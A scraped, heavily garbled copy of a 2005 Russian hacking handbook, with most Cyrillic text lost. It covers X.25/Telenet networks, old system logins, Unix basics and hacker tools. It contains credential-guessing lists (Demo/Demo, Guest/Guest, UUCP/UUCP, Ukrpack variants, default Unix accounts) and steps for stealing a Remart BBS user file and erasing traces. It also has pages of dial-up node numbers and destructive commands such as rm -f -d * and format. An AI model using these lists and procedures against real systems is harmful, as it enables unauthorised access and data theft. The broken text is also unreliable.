Upload
florescuvlad
View
275
Download
0
Embed Size (px)
Citation preview
,
2005
004.056 32.973.202
36
.
36 : / . - 3- . - .: , 2005. - 320 .
ISBN 5-9643-0049-9 -
. 2000 . -. ,
, ,
, - .
-
. , ,
.
.
, ,
, .
,
, .
,
, U N I X ftpd ftp, , , ,
Internet, DNS- Internet .
, ,
, ,
,
.
Windows NT, Linux Unix .
, .
, , , , , .
-
,
. ,
.
, ,
. ,
-,
,
.
004.056 32.973.202
., 2005 -, 2005
ISBN 5-9643-0049-9 , 2005
... 3
,
- . :
, . -
.
, .
, - , ,
,
,
(cracker) . .
,
. .
.
... , ,
. - , .
! , , ; . , - . - .
; , .
,
...
4 ...
...
, 2 , .
, , .
: , .
: , , , -.
: , , , -, ,
, .
, ,
, : , .
, : ,
, , .
, , .
, : , Windows , c .
: , , . ,
, , ; .
.
. : : ?
: , Windows , c .
: , !
, Windows, , . ,
, ,
... 5
; , , .
,
: ? : , . :
? ? : , , , ,
.
: ? : .
: , ,
,
: ,
.
: ,
,
, .
: , ,
; ; ; . ,
.
General protection fault.
6
1. ?
,
, .
, ,
.
, ,
,
-
ARPAnet. . Internet. Unix , . Usenet. World Wide Web. ,
, , , - .
-. ,
, . ,
.
,
, ,
.
, ,
.
,
, . ( , , ), .
.
, .
, ,
7
,
.
,
,
.
: , .
, .
, - alt.2600 ,
, , .
- ,
, ,
.
- ,
,
.
, , ,
.
.
, 9 10 , -
,
( exploit). ( 10% ).
- ,
. , -,
, , ,
( ). ,
-
.
8
,
. ,
,
, : , .
- ( , ) , , . -
. , -,
: rm -f-d *, del *.*, format : /U .., , -, .
, -
.
, (
). ,
, ,
, , .
- (, , ), - ,
,
.
( ). Internet ,
Web-, . -
(, , ..). , , , -
.
- ,
,
- ,
9
. ,
, ,
: ,
. ,
,
.
, ,
,
. , ,
, . , , -
, .
, , , . ,
, ,
, ,
.
,
, -
,
.
-
, ,
,
: , (registration key) - ..
, ,
. ,
, . ,
,
- - .
- !
. ,
-
,
! , - , -
10
. ,
-, ,
. , .
,
,
.
,
, ,
. . ,
, ,
.. . . .
, ,
.
!
32- ,
, 70- , . .
,
. .
,
-.
; .
,
. , ,
, .
-,
.
( ) $10 . , .
, ,
, . , ,
. ; -
11
, -
, , ! 8 ,
. ,
,
.
, ,
,
.
,
. ? , ! , ,
. , ,
,
. , ,
?!
, ,
. 90- , , ,
( ) !
.
,
. ,
, ,
, .
( !). , , -
.
; , , , !
. . .
,
70- . ,
.
12
2.
,
. ,
, ,
. , ,
, .
, .
, , - ,
.
, -
, ,
.
,
, :
,
.
- ,
, .
. -
,
, .
, ,
, ,
.
,
, , .
,
, , .
-
. , , ,
, ,
, ,
- , .
.
13
- .
,
.
, ,
- , ,
.
, ,
,
.
,
, , , -
.
, ,
.
, ,
, , , .
- .
( ) ,
, ,
, , - .
. -
, .
, ,
,
, , ( ).
,
,
.
,
. ,
.
- .
-. ,
,
, . ,
, -
, .
14
, ,
.
, .
, .
- ,
, ,
. , -
.
.
, , .
, ,
, ,
.
.
.
, ,
. , ,
, -
-. , , ,
, .
, .
, ,
,
. ,
. -
, ,
.
,
, .
, .
, .
3.
- , -
. , -
15
, ,
.
,
. ,
, , ,
HTML. :
.
, , .
,
Python. , . ,
, . ,
.
,
( ), .
, .
, ,
,
, . ,
.
,
, Unix ( , ). - Perl LISP. Perl : web- , Perl, . LISP , , .
,
LISP.
, , (Python, , Perl, LISP). , , ,
.
16
, , - .
, (, , - ). , .
-
. -
- , ; , ; , ... ,
.
,
,
.
: , ( ) . ...
Unix , .
,
. ,
, - Linux BSD-Unix, .
, , Unix. -
. ,
DOS, Windows MacOS - , .
, Unix - Internet. Internet Unix, Internet-, Unix. Unix-. ( , , Unix Internet , Microsoft , .)
Unix, Linux, ( -, Linux, DOS/
17
Windows ). . . . Internet. . .
( , Lisp Perl), Microsoft . , ,
,
-.
World Wide Web HTML.
, ,
, ,
- --
. WWW - , - , .
( ) Web.
,
( ), HTML, Web. , HTML , - .
.
, . Web - . - ,
. , ,
.
, -
. / .
4.
, -
. ,
, - ,
( ) .
18
, ,
,
( , ). -, ( , ), , -
.
, - ,
. ,
, , , ,
, . ,
. , ,
.
, ,
:
.
( ) - , ,
.
-
(free software), , ,
-.
, open-source software.
- ,
,
, ,
.
.
,
.
.
, - (, , ,
19
) .
.
,
, , -.
,
.
, .
.
-
Web- (FAQ, ) .
,
.
.
( Internet, ) . , , ,
: , ,
, RFC .
, , ,
,
, .
.
.
, (, ). ,
.
,
, , .
,
.
20
: ,
. ,
, ,
,
.
5.
, ,
. , , ,
.
,
.
-
.
,
- , . .
-.
, ,
.
,
, , . ,
. - , ,
.
6.
, ,
. , ,
. ( ), , , -
.
21
.
( --).
- / . ( , , ).
.
.
- .
.
. (, .)
,
, .
- ,
,
( ,
). , , , .
.
Usenet ( - ).
-
, .
,
.
, ,
, - . ,
, .
7.
.
22
.
60- , , . , ,
,
.
.
...
. -,
, Analog, Scientific American Smithsonian, - .
,
,
.
, ,
, .
- - ,
. ,
. - -
.
, .
-
,
,
. , ,
,
.
, ,
.
-
.
.
, ,,
, .
,
,
.
23
,
,
,
. , ,
, , .
,
,
,
.
...
16 22 , ,
. , ,
,
, .
: - , , , ,
,
- .
- , ,
.
- .
, - ,
,
, , .
shareware freeware, PGP (Pretty Good Privacy) - , SATAN ( ) - , ,
-
, .
Internet - .
, ,
.
, , -
24
,
, ,
, .
,
.
,
. ,
70- .
.
- ,
,
. ,
-1.
, , ,
, .
. 80-
, IBM. , (Electronic Frontier Foundation), - - Lotus 1-2-3,
.
, ,
, Internet - 50 . , Internet, , , - ..
,
- .
25
BBS (Bulletin Board System - ), USENET, 80- ( User's Network - ) - .
: . USENET - ,
,
.
.
-
Internet, .
8. ?
.
. ,
, , .
. ,
.
.
.
.
Internet. . .
Internet.
. ,
-
-
, , ,
Web- .
, HackZone - . ,
,
,
.
26
,
,
. - : -,
Windows NT, , Pepsi-Cola... , , .
-
.
. ,
.
- xpress.ru , D2MAC. D2MAC - , - .
,
, -...
, -
, -
Internet, , . ,
Internete, ! , D2MAC , ,
, .
Windows NT , , , ,
. NT Security, ,
Windows NT - ,
. ,
, ,
Windows NT ,
, NT Security , .
Windows NT -
, .
27
: , ,
-,
,
. ,
, ,
- ,
.
Happy Hackers Guide - - .
Internet ,
.
,
,
.
, ,
: Internet-, , .
,
.
hacked.net ,
. : , ,
.
.
- , , 2600.. , ,
,
.
10 , - 1984 ( , , ). 1987 1995-. .
, , ,
-
.
-
.
28
-
-, , .
,
-
,
!
LOpht ( ) Heavy Industries - , ,
2600. - LOpht Crack 2.0, , Windows NT.
,
,
, Mondo 2000. , -
. ,
- , - -
. , , ,
: ,
LOpht . , -
.
Nomad Mobile Research Centre - -
: Windows NT, , , .
,
Novell. Compute .
? -,
, .
,
Internet , -
. ,
, .
,
, , , - .
29
9. -
,
, .
, , ,
, .
.
,
. ,
.
, ,
.
(
, ,
). ,
.
,
; , ,
!
,
,
-.
, ( ) , .
; . , . ,
, .
, ,
,
30
, , , .
.
,
.
,
-Z -S. Internet, .
Internet , . , , -
,
.
, . ...
!
Internet Intranet 31
Internet Intranet
1. ,
Internet - , ,
: . Internet TCP/IP, :
IP (Internet Protocol) - ,
;
UDP (User Datagram Protocol) - ,
IP ;
TCP (Transmissing Control Protocol) - ,
IP .
, Internet, IP-.
Internet- : . ,
; (routing). . , IP- ( ), , 194.85.31.20.
2. (DNS)
DNS (Domain Name System) - ,, ,
Internet. ,
32 Internet Intranet
, IP- . ,
. ,
- IP- .
DNS , , .
, ( ). .
, , , :
.gov - ;
.mil - ; - ;
.net - ;
.org - ;
.edu - . ,
, ISO. : www.spm.ru - ;
www.berlin.de - ; www.hotex.nl - .
3. Internet
Internet ., :
ping - .
traceroute - ( Windows 95 Windows NT - tracert.exe).
nslookup - DNS-.
Internet Intranet 33
telnet - (23 ) .
ftp - FTP (File Transfer Protocol) (21 ).
finger - , - .
WWW (World Wide Web) Netscape Navigator, Internet Explorer . (80 ) HTTP.
: ftp, telnet, finger www , , ,
-.
4. Internet
, ,
.
, ,
Internet, , . , .
Internet . :
- ( , ) Internet, ( ) .
Internet, - ,
.
(?! Internet?! WWW-cepeepa ?! ?! ! Internet!)
2-2588
34 Internet Intranet
- ,
, Internet.
,
.
- .
,
Internet, .
:
, ,
, .
- :
Internet ( ). ,
,
, .. ,
Internet.
,
Internet , ,
.25 ( SPRINT).
5.
.25 (), . ,
, .. ,
, .
,
-.
, . -
.Internet Intranet 35
(),
.
INUA (Network Users Address/ ) , .
INUI (Network User Identiflcator/
) .
.
DNIC (Data Network Identification Code/ ) 4 ,
.
PAD (Packet Assemble Disassembler// ) ,
, ..
, .
.25 .25 (
Telemate Telix). , ,
,
.
,
, .
,
. ,
, .. _
36 Internet Intranet
. , ,
-
,
.
: . ,
. ,
.
.
, -
, CTRL-P. :
CON - .25; LOC - ; CLR - ; PAR? - .; SET - .; SET? - .
;
PROF - .;
INT - ;
RESET - ; STATUS - .
:
- ;
ERR - ;
RESET - ; FREE - STATUS
;
Internet Intranet 37
ENGAGED - STATUS ;
CLRCONF - ;
CLR - :
DTE DTE ;
1 ;
3 INV - ;
5 NC - ; 9 DER - ; 11 NS - ; 13 NP - ;
17 RPE - ;
19 ERR - ; 21 PAD - ;
25 NRC - ; 33 INC - ;
41 NFC - ;
128 DTE - ;
129 DTE - DTE ; 130 DTE - ; 131 DTE - DTE .28;
132 DTE - DTE ; 133 DTE - DTE ;
134 DTE - ; 135 DTE - ; 136 DTE - .25; 137 DTE - DTE ;
138 DTE - .
38
1.
-
.
, .
. ? . ,
, .
,
, .
.
!
2.
,
. , , .
, ,
.
, .
, ,
, , -
, ,
- .
,
.
,
.
, :
1. , , .
2. .,
39
FDM, , !
3. , :
) ; ) ; )
MA BELL.
! - ,
. , ,
.
,
, ,
( ). , (.. ) .
4. .
5. - , , .
, , ,
, ,
, .
3.
. ,
.
,
, .
, .
, ,
- .
.
40
,
90VnpH20-30Hz
30-50V
600V. ! MOV. .
. ,
, ,
, , .
4.
.
. ,
33 , .
,
. , ,
, .
, , ,
... -
. ,
! - ,
.
5. FI
,
, - .
.
.
RFI ,
41
.
,
. , , ,
!
6. ESS
- Electronic Standardized Switching ( ESS), . ? ,
. ! - . , , ,
.
55 . , ! , -
. ! ESS . ,
, . , , ESS , .
! !
42
1. !
,
, .
, ,
: , ,
, .
,
.
,
.
2.
, . 50- (MIT) .
. , ,
. -
,
. ,
, ,
,
.
.
43
,
( , ..)
,
( ,
ID , ) ,
.
.
, ,
,
,
.
-
.
: , ,
, .
3.
-
Telenet. ? -, , . -,
. -,
Telenet, . ,
. - ,
, ,
.
, ,
.
Telenet , , , Telenet Tymnet, ItaPAC, Janet, DATAPAC, SBDN, PandaNet, THENET .
44
, , -
. , :
=
- type . vt100 , . ,
-.
@. :
@ mail . phones
. ,
phones. , - . , dialup. local dialup,
=
@. , Telenet PAD. PAD / ( ), Public Access Device ( ). .
Telenet , , PAD, , 128 (, ) 9600 19 200 PAD, ,
. PAD , ,
. .
PAD , .
PAD? , ,
(NUA) , .
,
refused collect connections , ,
@ prompt.
45
, - Refused Collect. - ID (NUI). N U I - /pw , Telenet.
,
PAD - Netlink . Telenet N U A ( ) , ( 713 , .) , , , - ( 914), :
@> 914 001
,
914 002. , - .
.
(914 2354), (422 121 = 422 121.01). , , .
. , 512 , 512 00000.00 512 00000.99, 1 512 00001.00 512 00001.99. !
, .
.
, ,
@ prompt
D .
Outdials , N U A
.
- outdial. Outdial - , telenet - PC, , .
46
,
Hayes 1200 outdial, Detroit, MI
VEN-TEL 212 Modem ,
Session 1234 established on Modem 5588 ,
H Help - , .
-
- , outdial diverter, . .
, outdial, - , . ,
, - (Redial last number). , . ,
. - -
. VENTEL- D, , .
, , X. 25 Communication PAD, , @. PAD, , , , ,
PAD, , .
PAD PAD, , . ,
Telenet, 212 44 Connected
212. , 44 PAD 212 . 21244 .
PAD, , , .
.
47
4.
, ,
. ,
, : ?
, ,
- .
,
, ,
.
VMS VAX- Digital Equipment Corporation (DEC)
VMS ( ) . VMS : USENAME
,
,
.
.
- ,
,
. VAX . HELP .
DEC-10 DEC-10 - DEC,
TOPS-10 . ..
DEC-10/20 , - .
[, ], - .
.systat ( ).
48
[234,1001] BOB JONES, JONES . , :
. l o g i n x x x , y y y , , .
.
, UIC, (UIC = ) .
UNIX ,
UNIX.
,
, .
UNIX l o g i n : . UNIX
( ), , .
Prime Prime, ,
Primos. Primecon 18.23.05 - ,
. . ,
,
login
18.00.00 Primos, ^ . , 19 +. Primos . Prime Telenet - NETLINK. - , NETLINK, . N U A ' , nc.
, NUA 026245890040004,
49
@nc:26245890040004 netlink.
-
Hewlett-Packard. :. HEWLETT-PACKARD - :
HELLO SESSION NAME, USERNAME, ACC0UNTNAME, GROUP
,
. -
, - ,
,
. , ,
, .
- ,
:, , .
IRIS IRIS Interactive Real Time Information System (
). PDP-1 l'S, - -.
Welcome to IRIS R9.1.4 Timesharing
ACCOUNT ID? Iris
.
VM/CMS VM/CMS - , IBM (Interna
tional Business Machines). , ,
VM/370 ONLINE ., Tops-10. ,
:
LOGON .
50
NOS NOS Networking operation system
Cyber, Control Data Corporation. NOS ,
WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978,1987
, ,
FAMILY:
return. user name:
- 7 - . , 7-DOC.
Decserver , , , ,
, ..
Decserver : Enter Username>
. - .
, - .
Local>
.
sh servises
sh nodes - ,
help. modem, dial, - , !
GS/1 GS/1 - . Decserver,
, GS/1 . :
51
GS/1 > .
GS/1, :
( , , , ..), , GS/1. , Decserver, :
< systemname > , , :
sh n
sh - ,
. ,
, .
5.
. -
: ,
.
, .
() .
ToneLoc v1.10 . - -
. , ,
, ?
Cracker Jack v1.4 . ,
.
52
Hacker's Utility V1.02 .
:
port scanner
finger lookup file extractor !
CyberKit v. 2.4 :
Trace Route
WhoIs Finger
Name Server Look Up Time Synchronizer
Quote of the Day . PGP Freeware v5.0
.
? ? , ! , . , ,
!
7th Sphere PortScan v1.1 7th Sphere.
.
:
1. , . . -
, - , .
,
, .
!
2. , , - (C++, Perl, JavaScript ).
53
Unix, TCP/IP . , ...
6 ( ).
1. , ( ), . ,
.
, ,
, ; , . ,
,
. , ,
, , .., , ,
, , .
2. 20:00 ( !) 00:00 . , , . ! , , . 00:00 , , 00:00 .
- . ,
( 00:00-03:00). - ,
, , -
.
3. , - , ( ) /, , ,
. , , /r, , . -
...
4. , - ..
GO ADMINi
54
, , -
( ). .
5. ,
. .
6. , - , n' ( -) . - / , .
7. -, , - ( ). / ?.
-
. ,
, -
. .
.
. . ,
, , ? , ,
,
.
, , -
.
,
. , ,
.
,
.
55
Display ANSI graphics ([Y]/N)? > [...- ( ). . . ] UserlD : Password:
ENTER YOUR NAME = > PASSWORD = > LANGUAGE = >
REX400 Logical Channel: 0 REX400 v 4 . 5 4 . 0 2 , Copyright (C) 1992-1996, Club400 Ltd.
M) Mail H) Help G) Gateway Q) Quit Hult i Host>
CISCO- User Access Verification Password: ,
, :
(UserlD/Password): Demo/Demo Test/Test Guest/Guest Gast/Gast Gost/Gost User/User Demo/Guest Test/Guest Guest/Test Gast/Demo Gost/Demo User/Demo Demo/Test Test/Demo Guest/Demo Gast/Guest Gost/Guest User/Guest Demo/Gast Test/Gast Guest/Gast Gast/Test Gost/Test User/Test Demo/Gost Test/Gost Guest/Gost Gast/Gost Gost/Gast User/Gast Demo/User Test/User Guest/User Gast/User Gost/User User/Gost Demo/New Test/New Guest/New Gast/New Gost/New User/New Demo/Temp Test/Temp Guest/Temp Gast/Temp Gost/Temp User/Temp New/New Temp/Temp New/Demo Temp/Demo New/Guest Temp/Guest New/Test Temp/Test New/Gast Temp/Gast New/Gost Temp/Gost New/Temp Temp/New New/User Temp/User ,
, :
56
Demo1/Demo1 ..,
. .
( ) .
- , :
UUCP/UUCP ,
.
UUCP/PCUU , .
UUCP/UUAOMIN
, .
, , , - .
, :
Alex/Alex Luda/Luda Boris/Boris Ludmila/Ludmila Yura/Yura Dasha/Dasha Alexey/Alexey Olga/Olga Boria/Boria Alexandr/Alexandr Egor/Egor Katia/Katia Alexander/Alexander Igor/Igor Anna/Anna Dima/Dima Vladimir/Vladimir John/John Dmitry/Dmitry Vova/Vova Nik/Nik Dmitriy/Dmitriy Vladymir/Vladymir Kolia/Kolia Diman/Diman Dimon/Dimon Toma/Toma Eugene/Eugene Vlad/Vlad Sergey/Sergey Elena/Elena Den/Den Serg/Serg Segre/Serge Victor/Victor Gera/Gera Gosha/Gosha Nikolay/Nikolay Tonya/Tonya Gesha/Gesha Denis/Denis Viktor/Viktor Helen/Helen Sasha/Sasha Leonid/Leonid Ira/Ira Greg/Greg Marina/Marina Iren/Iren Misha/Misha Andre/Andre I r i n a / I r i n a Stas/Stas Andy/Andy Lena/Lena Gena/Gena Andrey/Andrey Lio/Lio Yuri/Yuri Oleg/Oleg Lion/Lion Yury/Yury K i r i l / K i r i l Leo/Leo Yuriy/Yuriy Eugeny/Eugeny Max/Max Anton/Anton Eugeniy/Eugeniy Maxim/Maxim Peter/Peter Evgeniy/Evgeniy Petr/Petr Svetlana/Svetlana A r t u r / A r t u r
5 7
Slava/Slava Ivan/Ivan Yaroslav/Yaroslav Mih/Mih Valera/Valera Yar/Yar Valery/Valery Valeriy/Valeriy Tomara/Tomara ..
, -
. - .
ID ,
.
. , -
.
.
, :
reg
registry
onboardl onboard - .
, MAIN (GO MAIN TREE, TYPE LIB TYPE LIBS TYPE LIB-TREE.
1 - .
, 6100255 , ,
,
, .
, ID . , ,
, ,
ID. , ID . ID , , / /, 10-15 ID. (/ ). . -
.
58
,
- .
:
1 - ( ). 2 - ( ). 3 - (
.
, ,
, .
.
,
:
,
.
.
.
8 .
.
, .
, ,
, .
( Demo Demo). , Demo/Demo, .
( - ): ! , ,
,
.
206-85-70 924-74-85
59
ID Password. ( ). !
, , -
.
.
, ( ) ID , ID. .
:
/ / / / Ukrpack / / (0482) 33-31-78/ /. :
Ukrpack/Ukrpack
Ukrpack/Kcaprku -
Ukrpack/ Andrew -
Ukrpack/Andy-
Ukrpack/Andrey- Ukrpack/Fylhtq - (
) ' Ukrpack/Kfpfhtd - (
) Ukrpack/Vbffqkjdbx- (
) Ukrpack/Lam -
Ukrpack/Aml -
Ukrpack/Mal -
Ukrpack/Lma -
Ukrpack/333178 -
Ukrpack/Telnet -
60
Ukrpack/Ntkytn - ( )
Ukrpack/Odessa - (, )
Ukrpack/Jltccf- ( )
, -
- .
-
,
.
() . ,
:
X = S
X - , S - , , - . ,
,
, ( ). , ,
( qwerty secret), -, - ( ) . : - . /U
:
.
.
Capture. :
/ /
/ , - -
ID , '.
61
.
< / ? / ?.
. ,
.
:
- , ..
,
, , .
!
- , -
.
. ,
, - - .
N (.. ') . , N , . ,
, , ,
Z ( --).
:
, , .. ,
...
USRACC.DAT ,
dat\usracc.dat , , , ,
.
, (, , ) , , . ,
30 000 (, ).
usracc.dat, .
62
1 usracc.dat,
( usracc.dat ).
,
useracc.dat . ( !) , . 6100255 .
2 ,
. ? , ?; ml, . :
1. , : , , :
ml /d /d , dos-.
:
:\> cd dir
( \remart \remart.40, ).
,
()
, d:, .
.
i: ,
, d, e, f, g, h, i, ...
2. , usracc.dat dat. He type - - , - ,
.
63
3. remart.bat . ,
.
, .
pause - , , ,
pause, , .
remart.bat cleanup.bat, .
remart.bat . cleanup.bat - !
remart.bat - DOS batch file missing, .
4. cleanup.bat type cleanup.bat .
del cleanup.bat -
type cleanup.bat , ; ( )
:
C:\REMART.40\DAT\USRACC.DAT :\ remart.40 ,
,
.
5. . , , , .
hangup, , ,
-
, .
, ( ), cleanup .
64
6. , remart.bat , cleanup.bat ( ) .
, .
( ). 7. . ,
usracc.dat, , del ( !..) . cleanup.bat.
8. rl _ 9. -...
,
.
,
(!) . admin/admin, , ,
adminoM. .
:
1 - . : Display ANSI
Graphics ([Y]/N)? >, @. . :
Login: Password: ,
Enter. (10-20 .) . , ,
.
@ - . , (5-6 .).
2 - .
. / ( ) -
65
, Enter ! ,
( ). . ,
, .
- .
3 - . ,
.
(, dir). . 4
- .
. - : /
6 6
,
:
/off , :
...
, , 6100255 .
, , Enter - , ( , ) . - /, / ..
,
, go chattop, - () / 1. -
,
, / 1, , . ,
, /, F+++ - , .
:
1. PROTECT ( ) - , , -
.
2. , SQRT ( Security), , , Alt+251 (v), . Demo - , . ? v , : SQRT ( , , Eclipse protection mode - 80286 -
67
). - - remstart.com , RE-MARTL.EXE , , .
: (8182) 43-36-71 43-31-21 47-37-00 49-31-21 47-36-23
: (81842) 4-36-80
: (3852) 26-16-71 22-54-41 24-33-01 23-67-40 24-29-74
: (38542) 4-87-40 4-36-54 4-87-41
: (38541) 31-205 43-411
: (38557) 2-42-73 2-35-23 2-32-06
68
: (38568) 2-10-99
: (38511) 2-02-16
2-20-06
2-00-17
: (07222) 70-232
: (4162) 44-22-56 44-22-10
44-88-70
44-22-38
44-22-47
: (08322) 69-106
69-107
: (4232) 26-12-10
22-42-43
: (42366) 4-43-13
4-72-06
: (42341) 2-06-01
2-57-51
: (86722) 49-075 69-601
69
: (8442) 32-77-90
32-54-94 36-14-40
36-43-54 36-42-31
: (84459) 7-50-77
3-75-34
: (0732) 56-19-46
55-54-67
56-19-47
56-04-35
56-19-48
56-19-49
: (07396) 28-486
: (3432) 44-98-81
.51-10-87
49-57-75
51-22-93
44-98-89
: (34370) 4-46-07
4-31-04
4-46-08
4-46-09
70
: (3412) 25-91-94
25-40-35
65-76-32
25-96-13
65-76-10
25-40-06
: (8432) 38-45-73 38-53-98 38-47-84
36-23-52 38-48-95 36-53-98. 38-47-74
38-47-07
: (84312) 9-24-39
3-16-13
9-63-45 9-63-45: 9-64-68
9-62-86
9-64-69
.3-16-13
3-34-22
: (84371) 2-27-18
2-17-52
71
.5-33-55
5-36-26
: (84357) 3-17-46
3-26-99' 3-17-60' 3-21-30
. : (8439) 58-82-15 58-82-08 58-82-17 58-57-03 58-82-35. 58-82-37
: (84342) 2-11-26
2-42-35
: (08422) 4-83-28
4-20-16
: (08456) 2-22-11
: (08442) 2-11-66
: (08431) 4-25-11
: (08439) 4-08-20
3-25-50
7 2
--: (42172) 3-00-60
3-68-38
3-41-75 3-58-57
: (86537) 2-36-55
5-94-65
2-36-50
2-35-91
: (86534) 5-46-21
7-32-26
7-59-02
: (86531) 4-13-98
3-09-58
3-61-71
4-18-91 : (86533)
5-94-11
4-13-31.
4-13-30 : (8612)
59-05-78 59-11-22 59-05-79 59-06-04 59-05-80
73
: (3912) 29-50-81 66-11-22 66-14-50
: (0712) 56-73-47 56-07-56 56-73-48 56-73-53 56-73-55 56-73-57 56-73-58 56-73-50
: (0742) 72-20-49 72-07-92 72-25-95
: (095) 975-84-03 924-74-85. 921-21-03 924-85-69 442-70-88 206-83-41 442-82-77 925-26-29 442-83-88 442-64-77 442-85-77
74
442-70-22
442-80-77
925-82-50 442-64-22
913-35-71
: (095) 229-61-04
229-77-69
: (226) 71-699
: (272) 62-551
: (264) 43-406
: (8152) 23-19-53
33-22-39 33-22-67
86622 2-72-49' 2-66-11
: (3832) 23-55-38 10-11-62
23-55-01 23-46-72
23-55-10 23-55-47
75
: (81600) 7-32-24
7-62-94
: (08622) 5-30-65 5-89-57 5-30-01 5-30-83
: (3532) 72-29-30
72-70-35 72-29-31
41-89-98
: (3422) 90-03-30
90-03-16
--: (8632) 69-69-81
64-57-66 64-45-50 66-25-82
: (0912) 93-03-01 77-55-73
-: (812) 325-16-26
311-08-01
277-08-19
7 6
: (8342) 17-94-11
17-60-70
: (8622) 99-97-10
99-97-99 92-22-82
: (8652) 35-79-06 35-68-65 35-41-42 35-75-05 35-74-18 35-15-79 35-67-24
: (08222) 55-02-52 33-05-28
: (3452) 26-21-09 26-23-45 26-21-00 26-18-00 24-48-31
: (34595) 33-186 .32-051
31-889
77
-: (30122) 6-29-29 6-62-33 6-27-27
: (3472) 52-62-10 52-62-20 37-73-40
: (4212) 21-81-47
33-29-99 38-62-76
: (3512) 38-07-15 60-56-63 38-07-16 38-07-17
78 Unix
Unix
1.
UNIX, , AT&T - 60- . , UNIX, , , , , , UNIX . ,
. , ,
, .
, - IBM , ? , UNIX . , ,
UNIX ( UNIX, , ). AT&T UNIX, - (AT&T 6300). Sun SunOS, UNIX, VAX- Ultrix, VAX- UNIX. : , (BSD, UNIX, SunOS, Ultrix, Xenix ..), , .
, , ,
. -
, UNIX ,, , , , ,
. , ,
UNIX VAX , - IBM-. , , ,
, VAX, VMS.
2. Unix
UNIX UNIX, - UNIX, , , ( Unix System V
Unix 79
BSD, SunOS, Ultrix, Xenix ..), .
, unix . , UNIX , , :
Login:
. , , , Unix, BBS, login- OS ( ) , Unix. (Xa!) Unix'bi Login: :
Welcome to SHUnix. Please log in.
( SHUNIX. ) Login:
- . Unix'bi (, BBS ) , , - . , Unix'ax , ,
UUCP/USENET/BITNET .
. (login)! (account). 8 . , ,
. ,
UNIX . , : .
.
:
ACCOUNT root sys biu mountfsys adm uucp nuucp anou
root - ( ) sys / system / bin sys / bin mountfsys adm uucp anon
anon
80 Unix
user
games install reboot demo umountfsys sync admiu guest daemou
user games install * ni. ie?a demo umountfsys sync admin guest daemon
root, mountfsys, umountfsys, install , , sync - . ,
.
, ,
/, . REBOOT , , -
. , ,
, - . ,
, UNISYS, HP/UX (Hewlett Packard Unixes). , .
, ,
(reboot), , .
BSD MIT ( ). :
rwho - ,
finger - w h o -
,
.
/ , , . login incorrect.
Unix 81
, ,
, ,
.
, . ,
, ,
.
- Cannot change to home directory Cannot Change Directory. home directory, , , . :\ :\, -, - /homedirectory. (: / ( ), \ ( )). , ,
['/']. No Shell. ,
shell, . .
, ,
() , Using the bourne shell Using sh.
.
,
.
, , : .
.
.
. .
UID ( ) . UID 0 ().
UID = 0 . (), . , DID = 50, - UID 50, , , .
82 Unix
4.
- ,
,
. ,
passwd. . . ,
, - ( ). - , -MAND.COM MS DOS, ( ). , ,
. , :
sh - , COMMAND.COM Unix. , Unix.
csh - , - .
ksh - korn. .
tcsh - , MIT. .
vsh - , . ... Windows DOS. rsh - restricted () remote () .
, ,
, Unix Unix, . , , ,
, .
Eskimo North, Unix . Esh, BBS, , , .
, -
.
Unix 83
, BBS.
,
:
$ ,
:
#
PS1 . , PS1 HI:, :
HI:
5.
Control-D .
, .
control-d, , .
Control-J .
@ .,
? wildcard (). .
, , b?b, Unix bob, bib, bub, / a-z, 0-9.
. *,
hit, him, hiiii, hiya , hi. H*l hill, hull, hi , h 1.
84 Unix
. b[o,u,i]b, : bib, bub, bob. b[a-d]b, : bab, bbb, bcb, bdb. [], ? *
.
Unix . , Hill hill - . , Hill, hill, hill, hili . , [], , . ..
6.
Unix. ,
.
IS .
, ,
Is .
:
$ is hithere runme note.text src
$ -I : $ is -1 rwx--x--x sirhack sirh 10990 runme ...
:
rwx-x-x - .
sirhack sirh - , , sirhack = , sirh = , .
Unix 85
10990 - . runme - .
cat . .
. :
$ cat note.txt !
$ cd (). : cd
/dir/dirl/dir2/dirn. did/... - . , :
$ cd / ., *
$ Is bin sys etc temp work us , , , -
$ cd /usr $ Is sirhack datawiz prophet:
violence par phiber scythian $ cd /usr/sirhack $ Is hithere runme
note.text src
$
86 Unix
, .
(), (, src), cd src [ /]. cd /usr/sirhack/src sirhack dir cd src.
.
: _ _
$ runme runme2 $ Is hithere runme note.text src runme2 , .
$ runme /usr/datwiz/runme
mv
.
: mv _ _
$ mv runme2 runit $ Is hithere runme note.text src runit :
$ mv runit /usr/datwiz/run $ Is hithere runme note.text src $ Is /usr/datwiz runme run
Unix 87
pwd
$ pwd /usr/sirhack $ cd src $ pwd /usr/sirhack/src $ cd .. $ pwd /usr/sirhack (.... ) $ cd . . /datwiz ( cd/usr/datwiz) $ pwd /usr/datwiz $ cd $home ( home) $ pwd /usr/sirhack
rm .
: _ rm - _
$ rm note.text $ Is hithere runme src $ write . ,
.
: write _* $ write scythian scythian has been notified (scythian ) Scy! ?? Message from scythian on tty001 at 17:32 ! : ? scy: .
88 Unix
: .
scy: ok : c o n t r o l - D [ ] $ who (w, who, whodo) , :
$ who login term logontirae scythian + tty001 17:20 phiberO + tty002 15:50 sirhack + ttyOOS 17:21 datawiz - tty004 11:20 glitch - tty666 66:60 $ who . + ,
write , - - .
man .
: man _. . , who, :
$ man who WH0O) xxx .
stty . man stty,
stty, , . : $ stty -parenb ,8,1. Unixno
,7,1.
sz, rz / zmodem.
, S X / xmodem.
Unix 89
rb, sb / batch () ymodem.. 6 Unix , .,
umodem / send/receive via umodem. $ sz filename ready to s e n d . . . ( ... ) $ rz filename please send your f i l e . . . (, . . . ) . . .e tc . . ( ..)
ed .
: ed_.
ed _ $ ed newtext
*
1 2 [control-z] * 1 [ 1] 1 * [ ] 3 [control-z] [ 0]
[control-z] 1,41
1 2 3 * w 71 * q $
90 Unix
:
*
*
71 - .
-
1 -
# -
w -
1 ftiame - fname
s fname - fname
w -
q -
mesg / (write)
( ). : mesg () mesg n ().
.
chmod . , .
: chmod mode filename (chmod _) $ chmod a+r newtext newtext:
- all () - read ().
chown .
: chown filename $ chown scythian newtext
Unix 91
chgrp .
: chgrp group file $ chgrp root runme $ finger .
: finger _
.
: grep file $ 1 newtext 1 $ newtext
$ " line 1" newtext $
mail . ,
. , , ELM, MUSH MSH, mail. :
mailusername@address
mail username
mail addrl!addr2!addr3!user mail username@address -
- . UNIX, DOS- VAX- Unix Mail. mail user@address; , .
92 Unix
.
:
mail phibereoptik
:
mail sysl! unisys! pacbell! sbell! scKatt. com! sirhacksys! optik!phiber . .,
, ,
. ,
